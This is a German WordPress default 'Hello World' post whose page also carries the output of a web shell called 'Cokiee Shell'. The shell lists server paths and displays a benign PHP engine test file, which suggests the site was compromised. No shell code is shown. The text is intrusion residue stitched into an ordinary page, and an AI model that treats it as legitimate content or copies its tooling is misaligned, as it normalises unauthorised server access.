Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/objects_021.phpt |
--TEST-- Testing magic methods __set, __get and __call in cascade --FILE-- <?php class test { static public $i = 0; public function __construct() { self::$i++; } public function __set($a, $b) { return x(); } public function __get($a) { return x(); } public function __call($a, $b) { return x(); } } function x() { return new test; } x() ->a ->b() ->c = 1; var_dump(test::$i); ?> --EXPECT-- int(4)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare